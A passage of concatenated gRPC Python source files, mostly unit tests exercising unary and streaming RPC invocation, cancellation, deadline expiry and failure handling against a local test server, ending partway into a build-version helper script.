self._digest.unary_unary_messages_sequences)):
for test_messages in test_messages_sequence:
first_request = test_messages.request()
second_request = test_messages.request()
first_response = self._invoker.blocking(group, method)(
first_request, test_constants.LONG_TIMEOUT)
test_messages.verify(first_request, first_response, self)
second_response = self._invoker.blocking(group, method)(
second_request, test_constants.LONG_TIMEOUT)
test_messages.verify(second_request, second_response, self)
def testParallelInvocations(self):
pool = logging_pool.pool(test_constants.THREAD_CONCURRENCY)
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_unary_messages_sequences)):
for test_messages in test_messages_sequence:
requests = []
response_futures = []
for _ in range(test_constants.THREAD_CONCURRENCY):
request = test_messages.request()
response_future = pool.submit(
self._invoker.blocking(group, method), request,
test_constants.LONG_TIMEOUT)
requests.append(request)
response_futures.append(response_future)
responses = [
response_future.result()
for response_future in response_futures
]
for request, response in zip(requests, responses):
test_messages.verify(request, response, self)
pool.shutdown(wait=True)
def testWaitingForSomeButNotAllParallelInvocations(self):
pool = logging_pool.pool(test_constants.THREAD_CONCURRENCY)
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_unary_messages_sequences)):
for test_messages in test_messages_sequence:
requests = []
response_futures_to_indices = {}
for index in range(test_constants.THREAD_CONCURRENCY):
request = test_messages.request()
response_future = pool.submit(
self._invoker.blocking(group, method), request,
test_constants.LONG_TIMEOUT)
requests.append(request)
response_futures_to_indices[response_future] = index
some_completed_response_futures_iterator = itertools.islice(
futures.as_completed(response_futures_to_indices),
test_constants.THREAD_CONCURRENCY // 2)
for response_future in some_completed_response_futures_iterator:
index = response_futures_to_indices[response_future]
test_messages.verify(requests[index],
response_future.result(), self)
pool.shutdown(wait=True)
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledUnaryRequestUnaryResponse(self):
raise NotImplementedError()
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledUnaryRequestStreamResponse(self):
raise NotImplementedError()
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledStreamRequestUnaryResponse(self):
raise NotImplementedError()
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledStreamRequestStreamResponse(self):
raise NotImplementedError()
def testExpiredUnaryRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_unary_messages_sequences)):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
self._invoker.blocking(group, method)(
request, _3069_test_constant.REALLY_SHORT_TIMEOUT)
def testExpiredUnaryRequestStreamResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_stream_messages_sequences)):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
response_iterator = self._invoker.blocking(group, method)(
request, _3069_test_constant.REALLY_SHORT_TIMEOUT)
list(response_iterator)
def testExpiredStreamRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.stream_unary_messages_sequences)):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
self._invoker.blocking(
group, method)(iter(requests),
_3069_test_constant.REALLY_SHORT_TIMEOUT)
def testExpiredStreamRequestStreamResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.stream_stream_messages_sequences)):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
response_iterator = self._invoker.blocking(
group, method)(iter(requests),
_3069_test_constant.REALLY_SHORT_TIMEOUT)
list(response_iterator)
def testFailedUnaryRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_unary_messages_sequences)):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.fail(), self.assertRaises(face.RemoteError):
self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT)
def testFailedUnaryRequestStreamResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_stream_messages_sequences)):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.fail(), self.assertRaises(face.RemoteError):
response_iterator = self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT)
list(response_iterator)
def testFailedStreamRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.stream_unary_messages_sequences)):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.fail(), self.assertRaises(face.RemoteError):
self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT)
def testFailedStreamRequestStreamResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.stream_stream_messages_sequences)):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.fail(), self.assertRaises(face.RemoteError):
response_iterator = self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT)
list(response_iterator)
```
#### File: interfaces/face/test_cases.py
```python
import unittest # pylint: disable=unused-import
# test_interfaces is referenced from specification in this module.
from tests.unit.framework.interfaces.face import _blocking_invocation_inline_service
from tests.unit.framework.interfaces.face import _future_invocation_asynchronous_event_service
from tests.unit.framework.interfaces.face import _invocation
from tests.unit.framework.interfaces.face import test_interfaces # pylint: disable=unused-import
_TEST_CASE_SUPERCLASSES = (
_blocking_invocation_inline_service.TestCase,
_future_invocation_asynchronous_event_service.TestCase,
)
def test_cases(implementation):
"""Creates unittest.TestCase classes for a given Face layer implementation.
Args:
implementation: A test_interfaces.Implementation specifying creation and
destruction of a given Face layer implementation.
Returns:
A sequence of subclasses of unittest.TestCase defining tests of the
specified Face layer implementation.
"""
test_case_classes = []
for invoker_constructor in _invocation.invoker_constructors():
for super_class in _TEST_CASE_SUPERCLASSES:
test_case_classes.append(
type(
invoker_constructor.name() + super_class.NAME,
(super_class,), {
'implementation': implementation,
'invoker_constructor': invoker_constructor,
'__module__': implementation.__module__,
}))
return test_case_classes
```
#### File: tests/unit/_rpc_test.py
```python
import itertools
import threading
import unittest
from concurrent import futures
import grpc
from grpc.framework.foundation import logging_pool
from tests.unit import test_common
from tests.unit.framework.common import test_constants
from tests.unit.framework.common import test_control
_SERIALIZE_REQUEST = lambda bytestring: bytestring * 2
_DESERIALIZE_REQUEST = lambda bytestring: bytestring[len(bytestring) // 2:]
_SERIALIZE_RESPONSE = lambda bytestring: bytestring * 3
_DESERIALIZE_RESPONSE = lambda bytestring: bytestring[:len(bytestring) // 3]
_UNARY_UNARY = '/test/UnaryUnary'
_UNARY_STREAM = '/test/UnaryStream'
_STREAM_UNARY = '/test/StreamUnary'
_STREAM_STREAM = '/test/StreamStream'
class _Callback(object):
def __init__(self):
self._condition = threading.Condition()
self._value = None
self._called = False
def __call__(self, value):
with self._condition:
self._value = value
self._called = True
self._condition.notify_all()
def value(self):
with self._condition:
while not self._called:
self._condition.wait()
return self._value
class _Handler(object):
def __init__(self, control):
self._control = control
def handle_unary_unary(self, request, servicer_context):
self._control.control()
if servicer_context is not None:
servicer_context.set_trailing_metadata(((
'testkey',
'testvalue',
),))
# TODO(https://github.com/grpc/grpc/issues/8483): test the values
# returned by these methods rather than only "smoke" testing that
# the return after having been called.
servicer_context.is_active()
servicer_context.time_remaining()
return request
def handle_unary_stream(self, request, servicer_context):
for _ in range(test_constants.STREAM_LENGTH):
self._control.control()
yield request
self._control.control()
if servicer_context is not None:
servicer_context.set_trailing_metadata(((
'testkey',
'testvalue',
),))
def handle_stream_unary(self, request_iterator, servicer_context):
if servicer_context is not None:
servicer_context.invocation_metadata()
self._control.control()
response_elements = []
for request in request_iterator:
self._control.control()
response_elements.append(request)
self._control.control()
if servicer_context is not None:
servicer_context.set_trailing_metadata(((
'testkey',
'testvalue',
),))
return b''.join(response_elements)
def handle_stream_stream(self, request_iterator, servicer_context):
self._control.control()
if servicer_context is not None:
servicer_context.set_trailing_metadata(((
'testkey',
'testvalue',
),))
for request in request_iterator:
self._control.control()
yield request
self._control.control()
class _MethodHandler(grpc.RpcMethodHandler):
def __init__(self, request_streaming, response_streaming,
request_deserializer, response_serializer, unary_unary,
unary_stream, stream_unary, stream_stream):
self.request_streaming = request_streaming
self.response_streaming = response_streaming
self.request_deserializer = request_deserializer
self.response_serializer = response_serializer
self.unary_unary = unary_unary
self.unary_stream = unary_stream
self.stream_unary = stream_unary
self.stream_stream = stream_stream
class _GenericHandler(grpc.GenericRpcHandler):
def __init__(self, handler):
self._handler = handler
def service(self, handler_call_details):
if handler_call_details.method == _UNARY_UNARY:
return _MethodHandler(False, False, None, None,
self._handler.handle_unary_unary, None, None,
None)
elif handler_call_details.method == _UNARY_STREAM:
return _MethodHandler(False, True, _DESERIALIZE_REQUEST,
_SERIALIZE_RESPONSE, None,
self._handler.handle_unary_stream, None, None)
elif handler_call_details.method == _STREAM_UNARY:
return _MethodHandler(True, False, _DESERIALIZE_REQUEST,
_SERIALIZE_RESPONSE, None, None,
self._handler.handle_stream_unary, None)
elif handler_call_details.method == _STREAM_STREAM:
return _MethodHandler(True, True, None, None, None, None, None,
self._handler.handle_stream_stream)
else:
return None
def _unary_unary_multi_callable(channel):
return channel.unary_unary(_UNARY_UNARY)
def _unary_stream_multi_callable(channel):
return channel.unary_stream(
_UNARY_STREAM,
request_serializer=_SERIALIZE_REQUEST,
response_deserializer=_DESERIALIZE_RESPONSE)
def _stream_unary_multi_callable(channel):
return channel.stream_unary(
_STREAM_UNARY,
request_serializer=_SERIALIZE_REQUEST,
response_deserializer=_DESERIALIZE_RESPONSE)
def _stream_stream_multi_callable(channel):
return channel.stream_stream(_STREAM_STREAM)
class RPCTest(unittest.TestCase):
def setUp(self):
self._control = test_control.PauseFailControl()
self._handler = _Handler(self._control)
self._server = test_common.test_server()
port = self._server.add_insecure_port('[::]:0')
self._server.add_generic_rpc_handlers((_GenericHandler(self._handler),))
self._server.start()
self._channel = grpc.insecure_channel('localhost:%d' % port)
def tearDown(self):
self._server.stop(None)
def testUnrecognizedMethod(self):
request = b'abc'
with self.assertRaises(grpc.RpcError) as exception_context:
self._channel.unary_unary('NoSuchMethod')(request)
self.assertEqual(grpc.StatusCode.UNIMPLEMENTED,
exception_context.exception.code())
def testSuccessfulUnaryRequestBlockingUnaryResponse(self):
request = b'\x07\x08'
expected_response = self._handler.handle_unary_unary(request, None)
multi_callable = _unary_unary_multi_callable(self._channel)
response = multi_callable(
request,
metadata=(('test', 'SuccessfulUnaryRequestBlockingUnaryResponse'),))
self.assertEqual(expected_response, response)
def testSuccessfulUnaryRequestBlockingUnaryResponseWithCall(self):
request = b'\x07\x08'
expected_response = self._handler.handle_unary_unary(request, None)
multi_callable = _unary_unary_multi_callable(self._channel)
response, call = multi_callable.with_call(
request,
metadata=(('test',
'SuccessfulUnaryRequestBlockingUnaryResponseWithCall'),))
self.assertEqual(expected_response, response)
self.assertIs(grpc.StatusCode.OK, call.code())
def testSuccessfulUnaryRequestFutureUnaryResponse(self):
request = b'\x07\x08'
expected_response = self._handler.handle_unary_unary(request, None)
multi_callable = _unary_unary_multi_callable(self._channel)
response_future = multi_callable.future(
request,
metadata=(('test', 'SuccessfulUnaryRequestFutureUnaryResponse'),))
response = response_future.result()
self.assertIsInstance(response_future, grpc.Future)
self.assertIsInstance(response_future, grpc.Call)
self.assertEqual(expected_response, response)
self.assertIsNone(response_future.exception())
self.assertIsNone(response_future.traceback())
def testSuccessfulUnaryRequestStreamResponse(self):
request = b'\x37\x58'
expected_responses = tuple(
self._handler.handle_unary_stream(request, None))
multi_callable = _unary_stream_multi_callable(self._channel)
response_iterator = multi_callable(
request,
metadata=(('test', 'SuccessfulUnaryRequestStreamResponse'),))
responses = tuple(response_iterator)
self.assertSequenceEqual(expected_responses, responses)
def testSuccessfulStreamRequestBlockingUnaryResponse(self):
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
expected_response = self._handler.handle_stream_unary(
iter(requests), None)
request_iterator = iter(requests)
multi_callable = _stream_unary_multi_callable(self._channel)
response = multi_callable(
request_iterator,
metadata=(('test',
'SuccessfulStreamRequestBlockingUnaryResponse'),))
self.assertEqual(expected_response, response)
def testSuccessfulStreamRequestBlockingUnaryResponseWithCall(self):
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
expected_response = self._handler.handle_stream_unary(
iter(requests), None)
request_iterator = iter(requests)
multi_callable = _stream_unary_multi_callable(self._channel)
response, call = multi_callable.with_call(
request_iterator,
metadata=(
('test',
'SuccessfulStreamRequestBlockingUnaryResponseWithCall'),))
self.assertEqual(expected_response, response)
self.assertIs(grpc.StatusCode.OK, call.code())
def testSuccessfulStreamRequestFutureUnaryResponse(self):
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
expected_response = self._handler.handle_stream_unary(
iter(requests), None)
request_iterator = iter(requests)
multi_callable = _stream_unary_multi_callable(self._channel)
response_future = multi_callable.future(
request_iterator,
metadata=(('test', 'SuccessfulStreamRequestFutureUnaryResponse'),))
response = response_future.result()
self.assertEqual(expected_response, response)
self.assertIsNone(response_future.exception())
self.assertIsNone(response_future.traceback())
def testSuccessfulStreamRequestStreamResponse(self):
requests = tuple(
b'\x77\x58' for _ in range(test_constants.STREAM_LENGTH))
expected_responses = tuple(
self._handler.handle_stream_stream(iter(requests), None))
request_iterator = iter(requests)
multi_callable = _stream_stream_multi_callable(self._channel)
response_iterator = multi_callable(
request_iterator,
metadata=(('test', 'SuccessfulStreamRequestStreamResponse'),))
responses = tuple(response_iterator)
self.assertSequenceEqual(expected_responses, responses)
def testSequentialInvocations(self):
first_request = b'\x07\x08'
second_request = b'\x0809'
expected_first_response = self._handler.handle_unary_unary(
first_request, None)
expected_second_response = self._handler.handle_unary_unary(
second_request, None)
multi_callable = _unary_unary_multi_callable(self._channel)
first_response = multi_callable(
first_request, metadata=(('test', 'SequentialInvocations'),))
second_response = multi_callable(
second_request, metadata=(('test', 'SequentialInvocations'),))
self.assertEqual(expected_first_response, first_response)
self.assertEqual(expected_second_response, second_response)
def testConcurrentBlockingInvocations(self):
pool = logging_pool.pool(test_constants.THREAD_CONCURRENCY)
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
expected_response = self._handler.handle_stream_unary(
iter(requests), None)
expected_responses = [expected_response
] * test_constants.THREAD_CONCURRENCY
response_futures = [None] * test_constants.THREAD_CONCURRENCY
multi_callable = _stream_unary_multi_callable(self._channel)
for index in range(test_constants.THREAD_CONCURRENCY):
request_iterator = iter(requests)
response_future = pool.submit(
multi_callable,
request_iterator,
metadata=(('test', 'ConcurrentBlockingInvocations'),))
response_futures[index] = response_future
responses = tuple(
response_future.result() for response_future in response_futures)
pool.shutdown(wait=True)
self.assertSequenceEqual(expected_responses, responses)
def testConcurrentFutureInvocations(self):
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
expected_response = self._handler.handle_stream_unary(
iter(requests), None)
expected_responses = [expected_response
] * test_constants.THREAD_CONCURRENCY
response_futures = [None] * test_constants.THREAD_CONCURRENCY
multi_callable = _stream_unary_multi_callable(self._channel)
for index in range(test_constants.THREAD_CONCURRENCY):
request_iterator = iter(requests)
response_future = multi_callable.future(
request_iterator,
metadata=(('test', 'ConcurrentFutureInvocations'),))
response_futures[index] = response_future
responses = tuple(
response_future.result() for response_future in response_futures)
self.assertSequenceEqual(expected_responses, responses)
def testWaitingForSomeButNotAllConcurrentFutureInvocations(self):
pool = logging_pool.pool(test_constants.THREAD_CONCURRENCY)
request = b'\x67\x68'
expected_response = self._handler.handle_unary_unary(request, None)
response_futures = [None] * test_constants.THREAD_CONCURRENCY
lock = threading.Lock()
test_is_running_cell = [True]
def wrap_future(future):
def wrap():
try:
return future.result()
except grpc.RpcError:
with lock:
if test_is_running_cell[0]:
raise
return None
return wrap
multi_callable = _unary_unary_multi_callable(self._channel)
for index in range(test_constants.THREAD_CONCURRENCY):
inner_response_future = multi_callable.future(
request,
metadata=(
('test',
'WaitingForSomeButNotAllConcurrentFutureInvocations'),))
outer_response_future = pool.submit(
wrap_future(inner_response_future))
response_futures[index] = outer_response_future
some_completed_response_futures_iterator = itertools.islice(
futures.as_completed(response_futures),
test_constants.THREAD_CONCURRENCY // 2)
for response_future in some_completed_response_futures_iterator:
self.assertEqual(expected_response, response_future.result())
with lock:
test_is_running_cell[0] = False
def testConsumingOneStreamResponseUnaryRequest(self):
request = b'\x57\x38'
multi_callable = _unary_stream_multi_callable(self._channel)
response_iterator = multi_callable(
request,
metadata=(('test', 'ConsumingOneStreamResponseUnaryRequest'),))
next(response_iterator)
def testConsumingSomeButNotAllStreamResponsesUnaryRequest(self):
request = b'\x57\x38'
multi_callable = _unary_stream_multi_callable(self._channel)
response_iterator = multi_callable(
request,
metadata=(('test',
'ConsumingSomeButNotAllStreamResponsesUnaryRequest'),))
for _ in range(test_constants.STREAM_LENGTH // 2):
next(response_iterator)
def testConsumingSomeButNotAllStreamResponsesStreamRequest(self):
requests = tuple(
b'\x67\x88' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_stream_multi_callable(self._channel)
response_iterator = multi_callable(
request_iterator,
metadata=(('test',
'ConsumingSomeButNotAllStreamResponsesStreamRequest'),))
for _ in range(test_constants.STREAM_LENGTH // 2):
next(response_iterator)
def testConsumingTooManyStreamResponsesStreamRequest(self):
requests = tuple(
b'\x67\x88' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_stream_multi_callable(self._channel)
response_iterator = multi_callable(
request_iterator,
metadata=(('test',
'ConsumingTooManyStreamResponsesStreamRequest'),))
for _ in range(test_constants.STREAM_LENGTH):
next(response_iterator)
for _ in range(test_constants.STREAM_LENGTH):
with self.assertRaises(StopIteration):
next(response_iterator)
self.assertIsNotNone(response_iterator.initial_metadata())
self.assertIs(grpc.StatusCode.OK, response_iterator.code())
self.assertIsNotNone(response_iterator.details())
self.assertIsNotNone(response_iterator.trailing_metadata())
def testCancelledUnaryRequestUnaryResponse(self):
request = b'\x07\x17'
multi_callable = _unary_unary_multi_callable(self._channel)
with self._control.pause():
response_future = multi_callable.future(
request,
metadata=(('test', 'CancelledUnaryRequestUnaryResponse'),))
response_future.cancel()
self.assertTrue(response_future.cancelled())
with self.assertRaises(grpc.FutureCancelledError):
response_future.result()
with self.assertRaises(grpc.FutureCancelledError):
response_future.exception()
with self.assertRaises(grpc.FutureCancelledError):
response_future.traceback()
self.assertIs(grpc.StatusCode.CANCELLED, response_future.code())
def testCancelledUnaryRequestStreamResponse(self):
request = b'\x07\x19'
multi_callable = _unary_stream_multi_callable(self._channel)
with self._control.pause():
response_iterator = multi_callable(
request,
metadata=(('test', 'CancelledUnaryRequestStreamResponse'),))
self._control.block_until_paused()
response_iterator.cancel()
with self.assertRaises(grpc.RpcError) as exception_context:
next(response_iterator)
self.assertIs(grpc.StatusCode.CANCELLED,
exception_context.exception.code())
self.assertIsNotNone(response_iterator.initial_metadata())
self.assertIs(grpc.StatusCode.CANCELLED, response_iterator.code())
self.assertIsNotNone(response_iterator.details())
self.assertIsNotNone(response_iterator.trailing_metadata())
def testCancelledStreamRequestUnaryResponse(self):
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_unary_multi_callable(self._channel)
with self._control.pause():
response_future = multi_callable.future(
request_iterator,
metadata=(('test', 'CancelledStreamRequestUnaryResponse'),))
self._control.block_until_paused()
response_future.cancel()
self.assertTrue(response_future.cancelled())
with self.assertRaises(grpc.FutureCancelledError):
response_future.result()
with self.assertRaises(grpc.FutureCancelledError):
response_future.exception()
with self.assertRaises(grpc.FutureCancelledError):
response_future.traceback()
self.assertIsNotNone(response_future.initial_metadata())
self.assertIs(grpc.StatusCode.CANCELLED, response_future.code())
self.assertIsNotNone(response_future.details())
self.assertIsNotNone(response_future.trailing_metadata())
def testCancelledStreamRequestStreamResponse(self):
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_stream_multi_callable(self._channel)
with self._control.pause():
response_iterator = multi_callable(
request_iterator,
metadata=(('test', 'CancelledStreamRequestStreamResponse'),))
response_iterator.cancel()
with self.assertRaises(grpc.RpcError):
next(response_iterator)
self.assertIsNotNone(response_iterator.initial_metadata())
self.assertIs(grpc.StatusCode.CANCELLED, response_iterator.code())
self.assertIsNotNone(response_iterator.details())
self.assertIsNotNone(response_iterator.trailing_metadata())
def testExpiredUnaryRequestBlockingUnaryResponse(self):
request = b'\x07\x17'
multi_callable = _unary_unary_multi_callable(self._channel)
with self._control.pause():
with self.assertRaises(grpc.RpcError) as exception_context:
multi_callable.with_call(
request,
timeout=test_constants.SHORT_TIMEOUT,
metadata=(('test',
'ExpiredUnaryRequestBlockingUnaryResponse'),))
self.assertIsInstance(exception_context.exception, grpc.Call)
self.assertIsNotNone(exception_context.exception.initial_metadata())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
exception_context.exception.code())
self.assertIsNotNone(exception_context.exception.details())
self.assertIsNotNone(exception_context.exception.trailing_metadata())
def testExpiredUnaryRequestFutureUnaryResponse(self):
request = b'\x07\x17'
callback = _Callback()
multi_callable = _unary_unary_multi_callable(self._channel)
with self._control.pause():
response_future = multi_callable.future(
request,
timeout=test_constants.SHORT_TIMEOUT,
metadata=(('test', 'ExpiredUnaryRequestFutureUnaryResponse'),))
response_future.add_done_callback(callback)
value_passed_to_callback = callback.value()
self.assertIs(response_future, value_passed_to_callback)
self.assertIsNotNone(response_future.initial_metadata())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED, response_future.code())
self.assertIsNotNone(response_future.details())
self.assertIsNotNone(response_future.trailing_metadata())
with self.assertRaises(grpc.RpcError) as exception_context:
response_future.result()
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
exception_context.exception.code())
self.assertIsInstance(response_future.exception(), grpc.RpcError)
self.assertIsNotNone(response_future.traceback())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
response_future.exception().code())
def testExpiredUnaryRequestStreamResponse(self):
request = b'\x07\x19'
multi_callable = _unary_stream_multi_callable(self._channel)
with self._control.pause():
with self.assertRaises(grpc.RpcError) as exception_context:
response_iterator = multi_callable(
request,
timeout=test_constants.SHORT_TIMEOUT,
metadata=(('test', 'ExpiredUnaryRequestStreamResponse'),))
next(response_iterator)
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
exception_context.exception.code())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
response_iterator.code())
def testExpiredStreamRequestBlockingUnaryResponse(self):
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_unary_multi_callable(self._channel)
with self._control.pause():
with self.assertRaises(grpc.RpcError) as exception_context:
multi_callable(
request_iterator,
timeout=test_constants.SHORT_TIMEOUT,
metadata=(('test',
'ExpiredStreamRequestBlockingUnaryResponse'),))
self.assertIsInstance(exception_context.exception, grpc.RpcError)
self.assertIsInstance(exception_context.exception, grpc.Call)
self.assertIsNotNone(exception_context.exception.initial_metadata())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
exception_context.exception.code())
self.assertIsNotNone(exception_context.exception.details())
self.assertIsNotNone(exception_context.exception.trailing_metadata())
def testExpiredStreamRequestFutureUnaryResponse(self):
requests = tuple(
b'\x07\x18' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
callback = _Callback()
multi_callable = _stream_unary_multi_callable(self._channel)
with self._control.pause():
response_future = multi_callable.future(
request_iterator,
timeout=test_constants.SHORT_TIMEOUT,
metadata=(('test', 'ExpiredStreamRequestFutureUnaryResponse'),))
with self.assertRaises(grpc.FutureTimeoutError):
response_future.result(
timeout=test_constants.SHORT_TIMEOUT / 2.0)
response_future.add_done_callback(callback)
value_passed_to_callback = callback.value()
with self.assertRaises(grpc.RpcError) as exception_context:
response_future.result()
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED, response_future.code())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
exception_context.exception.code())
self.assertIsInstance(response_future.exception(), grpc.RpcError)
self.assertIsNotNone(response_future.traceback())
self.assertIs(response_future, value_passed_to_callback)
self.assertIsNotNone(response_future.initial_metadata())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED, response_future.code())
self.assertIsNotNone(response_future.details())
self.assertIsNotNone(response_future.trailing_metadata())
def testExpiredStreamRequestStreamResponse(self):
requests = tuple(
b'\x67\x18' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_stream_multi_callable(self._channel)
with self._control.pause():
with self.assertRaises(grpc.RpcError) as exception_context:
response_iterator = multi_callable(
request_iterator,
timeout=test_constants.SHORT_TIMEOUT,
metadata=(('test', 'ExpiredStreamRequestStreamResponse'),))
next(response_iterator)
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
exception_context.exception.code())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
response_iterator.code())
def testFailedUnaryRequestBlockingUnaryResponse(self):
request = b'\x37\x17'
multi_callable = _unary_unary_multi_callable(self._channel)
with self._control.fail():
with self.assertRaises(grpc.RpcError) as exception_context:
multi_callable.with_call(
request,
metadata=(('test',
'FailedUnaryRequestBlockingUnaryResponse'),))
self.assertIs(grpc.StatusCode.UNKNOWN,
exception_context.exception.code())
def testFailedUnaryRequestFutureUnaryResponse(self):
request = b'\x37\x17'
callback = _Callback()
multi_callable = _unary_unary_multi_callable(self._channel)
with self._control.fail():
response_future = multi_callable.future(
request,
metadata=(('test', 'FailedUnaryRequestFutureUnaryResponse'),))
response_future.add_done_callback(callback)
value_passed_to_callback = callback.value()
self.assertIsInstance(response_future, grpc.Future)
self.assertIsInstance(response_future, grpc.Call)
with self.assertRaises(grpc.RpcError) as exception_context:
response_future.result()
self.assertIs(grpc.StatusCode.UNKNOWN,
exception_context.exception.code())
self.assertIsInstance(response_future.exception(), grpc.RpcError)
self.assertIsNotNone(response_future.traceback())
self.assertIs(grpc.StatusCode.UNKNOWN,
response_future.exception().code())
self.assertIs(response_future, value_passed_to_callback)
def testFailedUnaryRequestStreamResponse(self):
request = b'\x37\x17'
multi_callable = _unary_stream_multi_callable(self._channel)
with self.assertRaises(grpc.RpcError) as exception_context:
with self._control.fail():
response_iterator = multi_callable(
request,
metadata=(('test', 'FailedUnaryRequestStreamResponse'),))
next(response_iterator)
self.assertIs(grpc.StatusCode.UNKNOWN,
exception_context.exception.code())
def testFailedStreamRequestBlockingUnaryResponse(self):
requests = tuple(
b'\x47\x58' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_unary_multi_callable(self._channel)
with self._control.fail():
with self.assertRaises(grpc.RpcError) as exception_context:
multi_callable(
request_iterator,
metadata=(('test',
'FailedStreamRequestBlockingUnaryResponse'),))
self.assertIs(grpc.StatusCode.UNKNOWN,
exception_context.exception.code())
def testFailedStreamRequestFutureUnaryResponse(self):
requests = tuple(
b'\x07\x18' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
callback = _Callback()
multi_callable = _stream_unary_multi_callable(self._channel)
with self._control.fail():
response_future = multi_callable.future(
request_iterator,
metadata=(('test', 'FailedStreamRequestFutureUnaryResponse'),))
response_future.add_done_callback(callback)
value_passed_to_callback = callback.value()
with self.assertRaises(grpc.RpcError) as exception_context:
response_future.result()
self.assertIs(grpc.StatusCode.UNKNOWN, response_future.code())
self.assertIs(grpc.StatusCode.UNKNOWN,
exception_context.exception.code())
self.assertIsInstance(response_future.exception(), grpc.RpcError)
self.assertIsNotNone(response_future.traceback())
self.assertIs(response_future, value_passed_to_callback)
def testFailedStreamRequestStreamResponse(self):
requests = tuple(
b'\x67\x88' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_stream_multi_callable(self._channel)
with self._control.fail():
with self.assertRaises(grpc.RpcError) as exception_context:
response_iterator = multi_callable(
request_iterator,
metadata=(('test', 'FailedStreamRequestStreamResponse'),))
tuple(response_iterator)
self.assertIs(grpc.StatusCode.UNKNOWN,
exception_context.exception.code())
self.assertIs(grpc.StatusCode.UNKNOWN, response_iterator.code())
def testIgnoredUnaryRequestFutureUnaryResponse(self):
request = b'\x37\x17'
multi_callable = _unary_unary_multi_callable(self._channel)
multi_callable.future(
request,
metadata=(('test', 'IgnoredUnaryRequestFutureUnaryResponse'),))
def testIgnoredUnaryRequestStreamResponse(self):
request = b'\x37\x17'
multi_callable = _unary_stream_multi_callable(self._channel)
multi_callable(
request, metadata=(('test', 'IgnoredUnaryRequestStreamResponse'),))
def testIgnoredStreamRequestFutureUnaryResponse(self):
requests = tuple(
b'\x07\x18' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_unary_multi_callable(self._channel)
multi_callable.future(
request_iterator,
metadata=(('test', 'IgnoredStreamRequestFutureUnaryResponse'),))
def testIgnoredStreamRequestStreamResponse(self):
requests = tuple(
b'\x67\x88' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_stream_multi_callable(self._channel)
multi_callable(
request_iterator,
metadata=(('test', 'IgnoredStreamRequestStreamResponse'),))
if __name__ == '__main__':
unittest.main(verbosity=2)
```
#### File: buildgen/plugins/expand_version.py
```python
import re
LANGUAGES = [
'core',
'cpp',
'csharp',
'objc',
'php',
'python',
'ruby',
]
class Version:
def __init__(self, s):
self.tag = None
if '-' in s:
s, self.tag = s.split('-')
self.major, self.minor, self.patch = [int(x) for x in s.split('.')]
def __str__(self):
"""Version string in a somewhat idiomatic style for most languages"""
